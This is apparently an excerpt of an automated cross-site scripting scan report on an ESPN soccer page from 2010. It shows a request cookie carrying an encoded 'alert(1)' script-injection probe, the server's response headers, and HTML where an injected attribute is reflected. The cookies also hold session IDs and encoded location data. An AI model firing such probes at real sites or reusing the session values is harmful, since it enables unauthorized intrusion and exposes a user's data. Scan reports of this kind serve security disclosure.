Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:06 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN19
Cache-Expires: Sat, 06 Nov 2010 23:31:06 GMT
Content-Length: 82015
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]...
<a href="/worldcup2010/team?team=6757&82ccb"><a>dea0025a04=1&_slug_=serbia&82ccb"> ...[SNIP]...
Report generated by XSS.CX at Sat Nov 13 20:12:03 CST 2010.